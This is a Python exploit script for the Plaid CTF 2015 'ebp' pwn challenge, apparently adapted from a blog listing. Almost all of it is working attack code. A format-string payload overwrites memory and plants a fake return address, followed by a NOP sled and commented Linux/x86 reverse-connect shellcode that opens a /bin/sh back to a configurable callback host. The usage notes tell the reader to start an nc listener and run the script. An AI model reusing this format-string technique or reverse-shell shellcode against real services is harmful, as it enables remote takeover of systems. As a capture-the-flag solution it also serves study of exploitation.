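"""Plaid CTF 2015 - "ebp" (pwn) exploit -- listing from a 2015-04-21 blog post.

The service has a format-string bug.  The payload starts with
``%134521152c%4$n``: printf emits 134521152 (== 0x0804a140) padding
characters and ``%4$n`` stores that count through the 4th stack argument.
The bytes that follow place 0x0804a380 at offset 196, where the function's
return address is subsequently read from; execution then presumably lands
on the NOP sled + reverse-connect shellcode at the end of the buffer.  The
two addresses are taken from the original listing and are not re-derived
here.  Flag: who_needs_stack_control_anyway?

Usage: set CALLBACK_IP/CALLBACK_PORT to a host you control, start a
listener there (``nc -lvp 1337``), then run the script.  The original
listing shipped with 1.1.1.1:1337 hard-coded inside the shellcode, so the
spawned shell would never have called back to the attacker.
"""
import struct
from socket import AF_INET, SOCK_STREAM, inet_aton, socket
from time import sleep

# Challenge service.  The commented-out local target is from the original.
HOST = "52.6.64.173"
PORT = 4545
# HOST = "192.168.0.13"
# PORT = 9001

# Where the reverse shell connects back to.  1.1.1.1:1337 is the value
# embedded in the original listing -- replace with your listener.
CALLBACK_IP = "1.1.1.1"
CALLBACK_PORT = 1337

# Seconds to wait before sending (lets the service get ready) and after
# sending (keeps the connection open while the payload is processed).
SEND_DELAY = 5

# Value stored by %4$n.  printf counts the padded %c output, so the field
# width must equal the value to write: 134521152 == 0x0804a140.
EBP_WRITE_VALUE = 0x0804a140
# Fake return address placed at offset 196 of the payload.
RET_ADDRESS = 0x0804a380


def p32(value):
    """Pack *value* as a 32-bit little-endian unsigned integer (x86)."""
    return struct.pack("<L", value)


def build_shellcode(ip, port):
    """Return the 74-byte Linux/x86 reverse-connect ``/bin//sh`` shellcode.

    ``ip`` and ``port`` are patched into the ``push imm32`` / ``push imm16``
    that build the sockaddr_in; the port is pushed in network byte order.
    NOTE(review): a callback address or port containing a NUL byte could be
    truncated if the target ever treats the buffer as a C string -- prefer
    values without NUL bytes.
    """
    return (
        # push 0x66; pop eax (socketcall); push 1; pop ebx (SYS_SOCKET);
        # xor edx,edx; push edx; push ebx; push 2 -> (AF_INET, SOCK_STREAM, 0)
        b"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02"
        # mov ecx,esp; int 0x80; xchg eax,edx (fd -> edx); mov al,0x66; push <ip>
        b"\x89\xe1\xcd\x80\x92\xb0\x66\x68"
        + inet_aton(ip)
        + b"\x66\x68"                  # push <port> (16-bit, network order)
        + struct.pack(">H", port)
        # inc ebx; push bx (AF_INET); mov ecx,esp; push 16; push ecx
        + b"\x43\x66\x53\x89\xe1\x6a\x10\x51"
        # push edx; mov ecx,esp; inc ebx (SYS_CONNECT); int 0x80;
        # push 2; pop ecx; xchg ebx,edx; mov al,0x3f (dup2)
        b"\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0"
        # int 0x80; dec ecx; jns (dup2 loop over 2,1,0); mov al,0xb (execve);
        # inc ecx; mov edx,ecx; push edx
        b"\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52"
        # push "//sh"; push "/bin"; mov ebx,esp
        b"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
        b"\xcd\x80"                    # int 0x80
    )


def build_payload(callback_ip=CALLBACK_IP, callback_port=CALLBACK_PORT):
    """Assemble the 854-byte payload sent to the service.

    Layout (byte offsets):
      0    "%134521152c%4$n"        format string (15 bytes)
      15   "A"*177 + "BBBB"         filler up to the fake return slot
      196  p32(0x0804a380)          fake return address
      200  "B"*500                  filler
      700  NOP sled                 80 bytes
      780  reverse-connect shellcode, 74 bytes
    """
    # "%%" -> literal "%", so this yields "%134521152c%4$n".
    fmt = ("%%%dc%%4$n" % EBP_WRITE_VALUE).encode("ascii")
    filler_1 = b"A" * 177 + b"BBBB"
    filler_2 = b"B" * 500
    nop_sled = b"\x90" * 80
    return (
        fmt
        + filler_1
        + p32(RET_ADDRESS)
        + filler_2
        + nop_sled
        + build_shellcode(callback_ip, callback_port)
    )


def main():
    """Connect to HOST:PORT, deliver the payload and hold the socket briefly."""
    payload = build_payload()
    sock = socket(AF_INET, SOCK_STREAM)
    try:
        sock.connect((HOST, PORT))
        sleep(SEND_DELAY)
        # sendall: a plain send() may write only part of the buffer.
        sock.sendall(payload)
        sleep(SEND_DELAY)
    finally:
        sock.close()


if __name__ == "__main__":
    main()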